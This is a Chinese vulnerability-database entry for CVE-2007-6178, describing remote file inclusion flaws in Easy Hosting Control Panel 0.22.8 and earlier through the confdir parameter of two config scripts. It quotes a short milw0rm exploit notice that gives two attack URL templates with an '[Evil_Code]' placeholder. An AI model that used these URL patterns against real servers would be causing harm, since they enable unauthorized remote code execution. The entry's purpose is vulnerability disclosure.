Ubuntu easy hosting control panel 多个远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1114013 漏洞类型 输入验证
发布时间 2007-11-28 更新时间 2008-09-22
CVE编号 CVE-2007-6178 CNNVD-ID CNNVD-200711-404
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/4671
https://www.securityfocus.com/bid/26623
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200711-404
|漏洞详情
Ubuntu(EHCP)0.22.8版本及其早期版本中的EasyHostingControlPanel存在多个PHP远程文件包含漏洞,远程攻击者借助config/中的(1)dbutil.bck.php和(2)dbutil.php的confdir参数的一个URL执行任意PHP代码。
|漏洞EXP
---------------------------------------------------------------
 ____            __________         __             ____  __   
/_   | ____     |__\_____  \  _____/  |_          /_   |/  |_ 
 |   |/    \    |  | _(__  <_/ ___\   __\  ______  |   \   __\
 |   |   |  \   |  |/       \  \___|  |   /_____/  |   ||  |  
 |___|___|  /\__|  /______  /\___  >__|            |___||__|  
          \/\______|      \/     \/                           
---------------------------------------------------------------

Http://www.inj3ct-it.org	    Staff[at]inj3ct-it[dot]org	

---------------------------------------------------------------

	  Multiple Remote File Inclusion

---------------------------------------------------------------

# Author: MhZ91 nobody.91@hotmail.it 

# Download Script: http://sourceforge.net/projects/ehcp

# register_globals = On 

# Exploit 

# http://[site]/[path]/config/dbutil.bck.php?confdir=[Evil_Code]

# http://[site]/[path]/config/dbutil.php?confdir=[Evil_Code]

---------------------------------------------------------------

# milw0rm.com [2007-11-28]
|受影响的产品
EHCP ehcp - easy hosting control panel 0.22.8
|参考资料

来源:MILW0RM
名称:4671
链接:http://www.milw0rm.com/exploits/4671
来源:XF
名称:ehcp-confdir-file-include(38698)
链接:http://xforce.iss.net/xforce/xfdb/38698
来源:BID
名称:26623
链接:http://www.securityfocus.com/bid/26623